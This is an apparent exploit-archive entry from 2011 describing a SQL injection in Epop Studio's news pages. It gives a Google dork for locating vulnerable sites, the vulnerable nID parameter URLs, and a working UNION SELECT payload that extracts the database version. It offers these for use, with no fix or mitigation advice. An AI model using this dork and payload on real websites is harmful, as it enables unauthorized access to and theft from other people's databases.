Epop Studio News SQL Injection



EKU-ID: 412 CVE: OSVDB-ID:
Author: Codeine Published: 2011-06-03 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


#########################################################
# Title : Epop Studio News SQLI
# Author: Codeine
# Vendor: Epop Studio[http://epopstudio.com/]
# Email : f3codeine[at]yahoo[dot]com
# Date : 06/01/2011
# Google Dork : intext:Site By epop studio | inurl:news.php?nID= 
# Category  : PHP [SQli]       
######################################################### 

[*]Injecton Point:
http://www.site.com/in_the_news.php?nID='1
http://www.site.com/news.php?nID='1

[*]Exploit:
http://www.site.com/in_the_news.php?nID=-276 union select 1,@@version,3,4,5,6,7,8--

#########################################################
# Greetz: Hidden
# Enjoy ^_^
#########################################################